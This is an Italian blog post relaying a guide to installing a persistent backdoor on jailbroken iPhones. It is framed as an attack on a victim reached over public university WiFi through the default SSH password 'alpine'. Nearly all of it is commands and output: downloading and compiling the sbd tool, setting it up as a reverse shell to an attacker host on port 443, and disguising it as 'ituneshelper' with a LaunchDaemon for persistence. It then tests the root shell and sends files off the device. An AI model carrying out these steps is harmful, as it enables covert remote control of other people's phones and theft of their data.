Il blog Coresec ha recentemente pubblicato una interessante guida su come installare una Backdoor permanente su un dispositivo iOS (iPhone, iPod Touch e iPad) a patto che il sistema sia stata Jailbrekkato e quindi vi siano attivi i permessi di root.
Molti utenti effettuando la procedura di Jailbreak per avere facilmente accesso ai propri file o alle applicazioni (per poi essere illegalmente copiate), questa procedura prevede l’installazione del pacchetto OpenSSH che permette di accedere remotamente al dispositivo tramite una semplice sessione SSH. Purtroppo gli utenti incuranti della sicurezza non procedono a cambiare la password di default (alpine) e quindi basta ritrovarsi collegati ad una rete wireless pubblica per essere una probabile vittima di un attaccante.
In questo articolo supponiamo che Mario abbia effettuato il Jailbreak del suo iPhone, installato OpenSSH senza cambiare la password di default e si trova all’Università dove è disponibile una rete WiFi pubblica senza alcuna protezione di tipo “Client Isolation”.
L’attaccante procederà ad una scansione di rete all’interno della rete WiFi dell’università, individuerà l’iPhone di Mario con il quale aprirà semplicemente una sessione SSH. Successivamente procederà all’installazione della Backdoor sbd-1.36 sviluppata da Michel Blomgren.
Una volta aperta la sessione SSH procediamo all’installazione ed esecuzione delle pacchetto iphone-gcc
iphone4:~ root# uname -an Darwin iphone4 11.0.0 Darwin Kernel Version 11.0.0: Tue Nov 1 20:33:58 PDT 2011; root:xnu-1878.4.46~1/RELEASE_ARM_S5L8930X iPhone3,1 arm N90AP Darwin iphone4:~ root# apt-get update Get:1 http://repo.biteyourapple.net ./ Release.gpg [490B] Hit http://cydia.zodttd.com stable Release.gpg Hit http://apt.saurik.com ios/675.00 Release.gpg Hit http://repo.insanelyi.com ./ Release.gpg ... iphone4:~ root# apt-get install iphone-gcc Reading package lists... Done Building dependency tree Reading state information... Done ... Setting up ldid (610-5) ... Setting up com.sull.iphone-gccheaders (1.0-11) ... Setting up com.sull.fake-libgcc (1.0-2) ... Setting up iphone-gcc (4.2-20080604-1-8) ... iphone4:~/sbd-1.36 root# apt-get install make Reading package lists... Done Building dependency tree Reading state information... Done ... Unpacking make (from .../make_3.81-2_iphoneos-arm.deb) ... Setting up make (3.81-2) ...
Scarichiamo ed estraiamo la Backdoor
iphone4:~ root# wget http://packetstorm.tacticalflex.com/UNIX/netcat/sbd-1.36.tar.gz --2012-04-23 23:50:43-- http://packetstorm.tacticalflex.com/UNIX/netcat/sbd-1.36.tar.gz Resolving packetstorm.tacticalflex.com... 173.160.180.156 Connecting to packetstorm.tacticalflex.com|173.160.180.156|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 84093 (82K) [application/x-gzip] Saving to: `sbd-1.36.tar.gz' 100%[======================================>] 84,093 66.3K/s in 1.2s 2012-04-23 23:50:45 (66.3 KB/s) - `sbd-1.36.tar.gz' saved [84093/84093] iphone4:~ root# tar -zxvf sbd-1.36.tar.gz sbd-1.36/ sbd-1.36/sbd.c sbd-1.36/doexec.c sbd-1.36/pel.c sbd-1.36/aes.c sbd-1.36/sha1.c sbd-1.36/socket_code.h sbd-1.36/pel.h sbd-1.36/aes.h sbd-1.36/sha1.h sbd-1.36/sbd.h sbd-1.36/doexec_unix.h sbd-1.36/doexec_win32.h sbd-1.36/readwrite.h sbd-1.36/misc.h sbd-1.36/Makefile sbd-1.36/mktarball.sh sbd-1.36/README sbd-1.36/COPYING sbd-1.36/CHANGES sbd-1.36/binaries/ sbd-1.36/binaries/sbd.exe sbd-1.36/binaries/sbdbg.exe iphone4:~ root# cd sbd-1.36 iphone4:~/sbd-1.36 root# ls -al total 224 drwx------ 3 1000 100 748 Sep 17 2004 ./ drwxr-x--- 6 root wheel 272 Apr 23 23:50 ../ -rw------- 1 1000 100 1876 Sep 17 2004 CHANGES -rw------- 1 1000 100 18007 Jun 8 2004 COPYING -rw------- 1 1000 100 2176 Jun 20 2004 Makefile -rw------- 1 1000 100 4880 Sep 11 2004 README -rw------- 1 1000 100 31370 Jun 12 2004 aes.c -rw------- 1 1000 100 549 Jun 11 2004 aes.h drwx------ 2 1000 100 136 Sep 11 2004 binaries/ -rw------- 1 1000 100 77 Jun 2 2004 doexec.c -rw------- 1 1000 100 7114 Sep 11 2004 doexec_unix.h -rw------- 1 1000 100 19060 Sep 8 2004 doexec_win32.h -rw------- 1 1000 100 14968 Sep 9 2004 misc.h -rwx------ 1 1000 100 624 Jun 13 2004 mktarball.sh* -rw------- 1 1000 100 13381 Sep 8 2004 pel.c -rw------- 1 1000 100 898 Sep 9 2004 pel.h -rw------- 1 1000 100 9829 Sep 9 2004 readwrite.h -rw------- 1 1000 100 20557 Sep 9 2004 sbd.c -rw------- 1 1000 100 2014 Jun 8 2004 sbd.h -rw------- 1 1000 100 8900 Jun 2 2004 sha1.c -rw------- 1 1000 100 436 Jun 2 2004 sha1.h -rw------- 1 1000 100 20800 Sep 9 2004 socket_code.h
Procediamo alla configurazione della Backdoor (esecuzione come demone, indirizzo ip, porta, password, impostazioni di crittografia, ecc ecc).
iphone4:~/sbd-1.36 root# cat sbd.h #define SOURCE_PORT 0 #define CONVERT_TO_CRLF 0 #define ENCRYPTION 1 #define SHARED_SECRET "password" #define QUIET 0 #define VERBOSE 0 #define DAEMONIZE 0 #define HIGHLIGHT_INCOMING 0 #define HIGHLIGHT_PREFIX "\x1b[0;32m" #define HIGHLIGHT_SUFFIX "\x1b[0m" #define SEPARATOR_BETWEEN_PREFIX_AND_DATA ": " #define RUN_ONLY_ONE_INSTANCE 0 #define INSTANCE_SEMAPHORE "shadowinteger_bd_semaphore" /* connect to 192.168.200.22 on port 443 (https) and serve /bin/bash. * reconnect every 10 seconds. */ #define DOLISTEN 0 #define HOST "192.168.200.22" #define PORT 443 #define RESPAWN_ENABLED 1 #define RESPAWN_INTERVAL 10 #define EXECPROG "/bin/bash"
Compiliamo SBD
<pre>iphone4:~/sbd-1.36 root# make usage: make unix - Linux, NetBSD, FreeBSD, OpenBSD make sunos - SunOS (Solaris) make win32 - native win32 console app (w/ Cygwin + MinGW) make win32bg - create a native win32 no-console app (w/ Cygwin + MinGW) make win32bg CFLAGS=-DSTEALTH - stealthy no-console app make mingw - native win32 console app (w/ MinGW MSYS) make mingwbg - native win32 no-console app (w/ MinGW MSYS) make cygwin - Cygwin console app make darwin - Darwin iphone4:~/sbd-1.36 root# make darwin rm -f sbd sbd.exe *.o core gcc -Wall -Wshadow -O2 -o sbd pel.c aes.c sha1.c doexec.c sbd.c strip sbd iphone4:~/sbd-1.36 root# ls -al sbd -rwxr-xr-x 1 root 100 55296 Apr 24 02:10 sbd*
Impostiamo l’avvio automatico della Backdoor attraverso LaunchDaemons
iphone4:~/sbd-1.36 root# cp sbd /usr/bin/ituneshelper iphone4:~/sbd-1.36 root# cd /Library/LaunchDaemons/ iphone4:/Library/LaunchDaemons root# ls -al total 16 drwxr-xr-x 2 root wheel 136 Apr 24 02:02 ./ drwxrwxr-x 18 root admin 816 Dec 31 15:38 ../ -rw-r--r-- 1 root wheel 847 Feb 15 2011 com.openssh.sshd.plist iphone4:/Library/LaunchDaemons root# cat << EOF >> com.ituneshelper.start.plist <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>Label</key> <string>com.ituneshelper.start</string> <key>ProgramArguments</key> <array> <string>/usr/bin/ituneshelper</string> </array> <key>RunAtLoad</key> <true/> <key>StartInterval</key> <integer>1</integer> </dict> </plist> EOF iphone4:/Library/LaunchDaemons root# ls -al total 16 drwxr-xr-x 2 root wheel 136 Apr 24 02:15 ./ drwxrwxr-x 18 root admin 816 Dec 31 15:38 ../ -rw-r--r-- 1 root wheel 404 Apr 24 02:01 com.ituneshelper.start.plist -rw-r--r-- 1 root wheel 847 Feb 15 2011 com.openssh.sshd.plist
L’installazione della Backdoor è conclusa, procediamo quindi a testare la connessione dal nostro PC
root@coresec:~# uname -an Linux coresec 3.0.0-17-generic #30-Ubuntu SMP Thu Mar 8 20:45:39 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux root@coresec:~# ifconfig eth0 Link encap:Ethernet HWaddr 00:0c:29:03:72:5e inet addr:192.168.200.22 Bcast:192.168.200.255 Mask:255.255.255.0 inet6 addr: fe80::20c:29ff:fe03:725e/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:14741 errors:0 dropped:0 overruns:0 frame:0 TX packets:10042 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:20159805 (20.1 MB) TX bytes:720669 (720.6 KB) root@coresec:/home/enzo/sbd-1.36# ./sbd -l -p 443 -k password id uid=0(root) gid=0(wheel) groups=0(wheel) /bin/bash -i bash: no job control in this shell bash-4.0# ps -ef UID PID PPID C STIME TTY TIME CMD 0 1 0 0 0:00.00 ?? 0:00.95 /sbin/launchd 0 19 1 0 0:00.00 ?? 0:00.95 /usr/libexec/UserEventAgent -l System 0 21 1 0 0:00.00 ?? 0:00.68 /usr/sbin/notifyd 0 23 1 0 0:00.00 ?? 0:00.41 /usr/sbin/syslogd 0 25 1 0 0:00.00 ?? 0:01.64 /usr/libexec/configd 25 27 1 0 0:00.00 ?? 0:01.53 /System/Library/Frameworks/CoreTelephony.framework/Support/CommCenterClassic 501 29 1 0 0:00.00 ?? 0:12.27 /System/Library/CoreServices/SpringBoard.app/SpringBoard 501 33 1 0 0:00.00 ?? 0:00.60 /System/Library/PrivateFrameworks/ManagedConfiguration.framework/Support/profiled 0 37 1 0 0:00.00 ?? 0:00.81 /usr/libexec/lockdownd 0 43 1 0 0:00.00 ?? 0:00.56 /System/Library/CoreServices/powerd.bundle/powerd 0 49 1 0 0:00.00 ?? 0:19.04 /usr/libexec/locationd 0 55 1 0 0:00.00 ?? 0:00.21 /usr/bin/sbsettingsd 0 56 1 0 0:00.00 ?? 0:00.69 /usr/sbin/wifid 501 58 1 0 0:00.00 ?? 0:00.46 /System/Library/PrivateFrameworks/Ubiquity.framework/Versions/A/Support/ubd 501 71 1 0 0:00.00 ?? 0:01.99 /usr/sbin/mediaserverd 501 72 1 0 0:00.00 ?? 0:00.13 /System/Library/PrivateFrameworks/MediaRemote.framework/Support/mediaremoted 65 73 1 0 0:00.00 ?? 0:00.27 /usr/sbin/mDNSResponder -launchd 501 75 1 0 0:00.00 ?? 0:00.87 /System/Library/PrivateFrameworks/IMCore.framework/imagent.app/imagent 501 76 1 0 0:00.00 ?? 0:00.45 /System/Library/PrivateFrameworks/IAP.framework/Support/iapd 0 78 1 0 0:00.00 ?? 0:00.13 /usr/libexec/fseventsd 501 79 1 0 0:00.00 ?? 0:00.92 /usr/sbin/fairplayd.N90 501 80 1 0 0:00.00 ?? 0:01.76 /System/Library/PrivateFrameworks/DataAccess.framework/Support/dataaccessd 501 86 1 0 0:00.00 ?? 0:00.45 /System/Library/PrivateFrameworks/ApplePushService.framework/apsd 501 87 1 0 0:00.00 ?? 0:00.34 /System/Library/PrivateFrameworks/AggregateDictionary.framework/Support/aggregated 501 92 1 0 0:00.00 ?? 0:00.39 /usr/sbin/BTServer 501 93 1 0 0:00.00 ?? 0:00.99 /usr/sbin/aosnotifyd 0 94 1 0 0:00.00 ?? 0:00.02 /usr/bin/ituneshelper 0 157 1 0 0:00.00 ?? 0:00.11 /usr/libexec/networkd 501 260 1 0 0:00.00 ?? 0:01.94 /Applications/MobileMail.app/MobileMail 501 261 1 0 0:00.00 ?? 0:00.75 /Applications/MobilePhone.app/MobilePhone 0 286 94 0 0:00.00 ?? 0:00.03 bash 0 300 286 0 0:00.00 ?? 0:00.03 /bin/bash -i 0 303 300 0 0:00.00 ?? 0:00.01 ps -ef bash-4.0# uname -an Darwin iphone4 11.0.0 Darwin Kernel Version 11.0.0: Tue Nov 1 20:33:58 PDT 2011; root:xnu-1878.4.46~1/RELEASE_ARM_S5L8930X iPhone3,1 arm N90AP Darwin
Se per esempio vogliamo trasferire un file dal dispositivo
root@coresec:/home/enzo/sbd-1.36# sbd -l -p 12345 -k secret > output.file iphone4:~/sbd-1.36 root# cat /.../.../input.file | ./sbd -k secret 192.168.200.22 12345
Infine vi riportiamo la procedura per disinstallare la Backdoor
iphone4:/Library/LaunchDaemons root# rm -rf com.ituneshelper.start.plist iphone4:/Library/LaunchDaemons root# rm -rf /usr/bin/ituneshelper
Eventuali aggiornamenti...
Nessun commento:
Posta un commento